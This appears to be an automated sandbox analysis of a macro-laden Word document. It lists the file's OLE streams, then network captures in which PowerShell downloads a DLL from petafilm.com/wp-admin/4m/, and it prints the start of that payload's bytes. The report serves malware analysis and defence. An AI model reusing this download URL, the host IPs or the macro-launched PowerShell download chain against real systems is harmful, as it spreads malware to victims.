                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 ae c5 45 f2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                      VBA Code Keywords

                                      Keyword
                                      Attribute
                                      VB_Name
                                      "Qafkrimwsho"
                                      VBA Code
                                      VBA File Name: Wm_t404p8v_, Stream Size: 1106
                                      General
                                      Stream Path:Macros/VBA/Wm_t404p8v_
                                      VBA File Name:Wm_t404p8v_
                                      Stream Size:1106
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 ae c5 f3 f6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                      VBA Code Keywords

                                      Keyword
                                      False
                                      Private
                                      VB_Exposed
                                      Attribute
                                      VB_Creatable
                                      VB_Name
                                      Document_open()
                                      VB_PredeclaredId
                                      VB_GlobalNameSpace
                                      VB_Base
                                      VB_Customizable
                                      VB_TemplateDerived
                                      VBA Code

                                      Streams

                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                      General
                                      Stream Path:\x1CompObj
                                      File Type:data
                                      Stream Size:146
                                      Entropy:4.00187355764
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                      General
                                      Stream Path:\x5DocumentSummaryInformation
                                      File Type:data
                                      Stream Size:4096
                                      Entropy:0.279952994103
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 528
                                      General
                                      Stream Path:\x5SummaryInformation
                                      File Type:data
                                      Stream Size:528
                                      Entropy:4.08784807247
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                      Stream Path: 1Table, File Type: data, Stream Size: 6424
                                      General
                                      Stream Path:1Table
                                      File Type:data
                                      Stream Size:6424
                                      Entropy:6.13606471955
                                      Base64 Encoded:True
                                      Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                      Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                      Stream Path: Data, File Type: data, Stream Size: 99189
                                      General
                                      Stream Path:Data
                                      File Type:data
                                      Stream Size:99189
                                      Entropy:7.39018675385
                                      Base64 Encoded:True
                                      Data ASCII:u . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . { . . B g . . . m d . z . M . . . . . . . . . . . . D . . . . . . . . F . . . . . . { . . B g . . . m d . z . M . . . . . . . .
                                      Data Raw:75 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 488
                                      General
                                      Stream Path:Macros/PROJECT
                                      File Type:ASCII text, with CRLF line terminators
                                      Stream Size:488
                                      Entropy:5.44671163464
                                      Base64 Encoded:True
                                      Data ASCII:I D = " { 3 2 8 4 0 4 E F - 4 1 6 C - 4 D E 8 - 9 A 4 2 - 2 0 1 5 6 D 2 2 2 C 2 6 } " . . D o c u m e n t = W m _ t 4 0 4 p 8 v _ / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Q a f k r i m w s h o . . M o d u l e = O i 5 o e l v 0 _ s 4 . . E x e N a m e 3 2 = " T j 8 d t f s u o p d k " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 0 1 2 B 2 B 0 B 6 B 0 B 6 B 0 B 6 B 0 B 6 " . . D P B = " 8 2 8 0 2 0 5 0 9 3 5 1 9 3
                                      Data Raw:49 44 3d 22 7b 33 32 38 34 30 34 45 46 2d 34 31 36 43 2d 34 44 45 38 2d 39 41 34 32 2d 32 30 31 35 36 44 32 32 32 43 32 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 57 6d 5f 74 34 30 34 70 38 76 5f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 51 61 66 6b 72 69 6d 77 73 68 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 69 35 6f 65 6c 76 30 5f 73 34 0d 0a 45 78 65 4e 61 6d 65 33 32 3d
                                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 110
                                      General
                                      Stream Path:Macros/PROJECTwm
                                      File Type:data
                                      Stream Size:110
                                      Entropy:3.60650024781
                                      Base64 Encoded:False
                                      Data ASCII:W m _ t 4 0 4 p 8 v _ . W . m . _ . t . 4 . 0 . 4 . p . 8 . v . _ . . . Q a f k r i m w s h o . Q . a . f . k . r . i . m . w . s . h . o . . . O i 5 o e l v 0 _ s 4 . O . i . 5 . o . e . l . v . 0 . _ . s . 4 . . . . .
                                      Data Raw:57 6d 5f 74 34 30 34 70 38 76 5f 00 57 00 6d 00 5f 00 74 00 34 00 30 00 34 00 70 00 38 00 76 00 5f 00 00 00 51 61 66 6b 72 69 6d 77 73 68 6f 00 51 00 61 00 66 00 6b 00 72 00 69 00 6d 00 77 00 73 00 68 00 6f 00 00 00 4f 69 35 6f 65 6c 76 30 5f 73 34 00 4f 00 69 00 35 00 6f 00 65 00 6c 00 76 00 30 00 5f 00 73 00 34 00 00 00 00 00
                                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5146
                                      General
                                      Stream Path:Macros/VBA/_VBA_PROJECT
                                      File Type:data
                                      Stream Size:5146
                                      Entropy:5.51240945881
                                      Base64 Encoded:False
                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                      Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 630
                                      General
                                      Stream Path:Macros/VBA/dir
                                      File Type:data
                                      Stream Size:630
                                      Entropy:6.3062184781
                                      Base64 Encoded:True
                                      Data ASCII:. r . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                                      Data Raw:01 72 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 08 e2 e3 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                      Stream Path: WordDocument, File Type: data, Stream Size: 25134
                                      General
                                      Stream Path:WordDocument
                                      File Type:data
                                      Stream Size:25134
                                      Entropy:3.92042329439
                                      Base64 Encoded:False
                                      Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . Y \\ . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . b . . . b . . . Y T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 59 5c 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 62 00 00 62 7f 00 00 62 7f 00 00 59 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 6, 2021 08:49:13.615979910 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.693485022 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.693684101 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.699331999 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.808119059 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808175087 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808206081 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808227062 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.808237076 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808267117 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808280945 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.808304071 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808339119 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808341026 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.808373928 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808407068 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808409929 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.808442116 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.808479071 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882118940 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882172108 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882200956 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882222891 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882225037 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882266045 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882276058 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882293940 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882318974 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882334948 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882344961 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882373095 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882381916 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882401943 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882426023 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882437944 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882450104 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882467031 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882493973 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882496119 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882524014 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882535934 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882548094 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882575989 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882590055 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882601023 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882623911 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882648945 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.882654905 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.882695913 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957150936 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957180977 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957206964 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957227945 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957248926 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957263947 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957289934 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957308054 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957307100 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957324982 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957349062 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957354069 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957357883 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957380056 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957415104 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957437038 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957437038 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957457066 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957479954 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957479954 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957505941 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957521915 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957525969 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957549095 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957564116 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957570076 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957590103 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957607031 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957612038 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957633018 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957647085 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957653046 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957676888 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957688093 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957700968 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957726002 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957741022 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957751989 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957776070 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957792044 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957801104 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957825899 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957849979 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957858086 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957875967 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957889080 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957902908 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957926989 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957946062 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957952023 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957977057 CET8049167176.53.69.151192.168.2.22

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 6, 2021 08:49:13.475481987 CET5219753192.168.2.228.8.8.8
                                      Jan 6, 2021 08:49:13.579385996 CET53521978.8.8.8192.168.2.22

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Jan 6, 2021 08:49:13.475481987 CET192.168.2.228.8.8.80x80acStandard query (0)petafilm.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Jan 6, 2021 08:49:13.579385996 CET8.8.8.8192.168.2.220x80acNo error (0)petafilm.com176.53.69.151A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • petafilm.com
                                      • 5.2.136.90

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.2249167176.53.69.15180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampkBytes transferredDirectionData
                                      Jan 6, 2021 08:49:13.699331999 CET0OUTGET /wp-admin/4m/ HTTP/1.1
                                      Host: petafilm.com
                                      Connection: Keep-Alive
                                      Jan 6, 2021 08:49:13.808119059 CET1INHTTP/1.1 200 OK
                                      Cache-Control: no-cache, must-revalidate
                                      Pragma: no-cache
                                      Content-Type: application/octet-stream
                                      Expires: Wed, 06 Jan 2021 07:49:24 GMT
                                      Last-Modified: Wed, 06 Jan 2021 07:49:24 GMT
                                      Server: Microsoft-IIS/10.0
                                      Set-Cookie: 5ff56b8489beb=1609919364; expires=Wed, 06-Jan-2021 07:50:24 GMT; Max-Age=60; path=/
                                      Content-Disposition: attachment; filename="QieaYu0XHj8.dll"
                                      Content-Transfer-Encoding: binary
                                      X-Powered-By: ASP.NET
                                      X-Powered-By-Plesk: PleskWin
                                      Date: Wed, 06 Jan 2021 07:49:23 GMT
                                      Content-Length: 192000
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 